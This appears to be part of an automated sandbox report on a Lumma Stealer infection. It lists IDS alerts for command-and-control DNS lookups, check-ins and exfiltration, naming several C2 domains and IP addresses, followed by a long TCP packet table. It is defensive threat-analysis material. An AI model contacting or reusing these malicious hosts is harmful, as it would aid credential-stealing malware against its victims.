2025-01-11T08:11:17.444962+0100	2059035	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)	1	192.168.2.10	51251	1.1.1.1	53	UDP
2025-01-11T08:11:17.457276+0100	2059039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)	1	192.168.2.10	64729	1.1.1.1	53	UDP
2025-01-11T08:11:17.468799+0100	2059057	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)	1	192.168.2.10	61176	1.1.1.1	53	UDP
2025-01-11T08:11:17.480645+0100	2059037	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)	1	192.168.2.10	50645	1.1.1.1	53	UDP
2025-01-11T08:11:17.492187+0100	2059043	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)	1	192.168.2.10	58478	1.1.1.1	53	UDP
2025-01-11T08:11:17.507322+0100	2059049	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)	1	192.168.2.10	62549	1.1.1.1	53	UDP
2025-01-11T08:11:18.196161+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49749	104.102.49.254	443	TCP
2025-01-11T08:11:18.701521+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.10	49749	104.102.49.254	443	TCP
2025-01-11T08:11:19.357724+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49757	104.21.96.1	443	TCP
2025-01-11T08:11:19.878073+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49757	104.21.96.1	443	TCP
2025-01-11T08:11:19.878073+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49757	104.21.96.1	443	TCP
2025-01-11T08:11:20.410096+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49766	104.21.96.1	443	TCP
2025-01-11T08:11:20.901411+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.10	49766	104.21.96.1	443	TCP
2025-01-11T08:11:20.901411+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49766	104.21.96.1	443	TCP
2025-01-11T08:11:22.087445+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49777	104.21.96.1	443	TCP
2025-01-11T08:11:25.393802+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.10	49777	104.21.96.1	443	TCP
2025-01-11T08:11:26.093840+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49803	104.21.96.1	443	TCP
2025-01-11T08:11:38.849640+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49887	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:11:13.445187092 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:13.445226908 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:13.445295095 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:13.455986977 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:13.456027031 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:13.936696053 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:13.936897993 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.011190891 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.011225939 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.011547089 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.011600018 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.014053106 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.055322886 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.318141937 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.318202019 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.318212986 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.318238020 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.318254948 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.318279982 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.320467949 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.320487022 CET	443	49722	104.21.56.70	192.168.2.10
Jan 11, 2025 08:11:14.320499897 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.320533991 CET	49722	443	192.168.2.10	104.21.56.70
Jan 11, 2025 08:11:14.446441889 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:14.451344967 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:14.451462030 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:14.451652050 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:14.456466913 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156667948 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156683922 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156783104 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.156888962 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156904936 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156917095 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156929016 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156964064 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156975031 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156986952 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.156997919 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.157083035 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.157083035 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.157083035 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.157083035 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.157083035 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.157206059 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.162534952 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.162565947 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.162580013 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.162589073 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.162621975 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.162650108 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.279782057 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279808998 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279839039 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279850960 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279861927 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279861927 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.279872894 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279884100 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.279887915 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.279930115 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.280612946 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.280635118 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.280647993 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.280658960 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.280685902 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.280699015 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.281162977 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.281183958 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.281196117 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.281212091 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.281213999 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.281225920 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.281235933 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.281261921 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.282059908 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282072067 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282083988 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282119036 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.282130957 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.282145977 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282159090 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282195091 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.282876015 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282900095 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282911062 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.282927990 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.282955885 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.285774946 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.285878897 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.370261908 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.370326042 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403175116 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403187990 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403225899 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403254986 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403359890 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403371096 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403382063 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403393984 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403407097 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403413057 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403419971 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403448105 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403547049 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403817892 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403831005 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403844118 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403855085 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403872013 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403886080 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.403976917 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.403989077 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404015064 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404016018 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404058933 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404076099 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404330969 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404344082 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404355049 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404366016 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404376030 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404406071 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404691935 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404704094 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404716969 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404727936 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404736042 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404741049 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404752970 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404761076 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404766083 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404793024 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404805899 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404840946 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404855013 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.404896975 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404896975 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.404980898 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405031919 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405577898 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405591011 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405601978 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405641079 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405746937 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405759096 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405771017 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405781984 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405790091 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405795097 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405810118 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405847073 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405884027 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405898094 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.405921936 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.405946970 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406707048 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406719923 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406732082 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406743050 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406748056 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406755924 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406768084 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406773090 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406780005 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406800985 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406822920 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406851053 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406863928 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406877041 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.406898022 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.406927109 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.493083954 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.493104935 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.493130922 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.493145943 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.493189096 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.493189096 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.525827885 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525841951 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525854111 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525898933 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.525908947 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525928020 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525942087 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525943995 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.525957108 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525964975 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.525970936 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.525996923 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526021957 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526190042 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526201963 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526215076 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526226044 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526242971 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526262999 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526330948 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526351929 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526364088 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526375055 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526386976 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526387930 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526422977 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526441097 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526608944 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526623964 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526634932 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526648998 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526659012 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526660919 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526671886 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526699066 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526715040 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526751041 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526762962 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526774883 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.526801109 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.526838064 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527173042 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527223110 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527256012 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527268887 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527281046 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527291059 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527302980 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527304888 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527349949 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527358055 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527369976 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527381897 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527390957 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527393103 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527405977 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527419090 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527446032 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.527964115 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527976036 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.527987957 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528000116 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528002024 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528012037 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528033018 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528073072 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528079987 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528094053 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528105974 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528125048 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528136969 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528151035 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528151989 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528151989 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528163910 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528170109 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528177023 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528178930 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528189898 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528207064 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528225899 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528940916 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528953075 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528964996 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528976917 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.528985023 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.528987885 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529002905 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529006958 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529031992 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529053926 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529074907 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529088020 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529099941 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529112101 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529123068 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529123068 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529134989 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529151917 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529151917 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529164076 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529172897 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529175997 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529186964 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529216051 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529896975 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529907942 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529937983 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529942036 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529949903 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529958963 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.529961109 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529975891 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.529984951 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.530006886 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.530041933 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.530054092 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.530065060 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.530076981 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.530080080 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.530113935 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.530136108 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.533822060 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.533834934 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.533845901 CET	80	49728	176.113.115.19	192.168.2.10
Jan 11, 2025 08:11:15.533894062 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:11:15.533924103 CET	49728	80	192.168.2.10	176.113.115.19
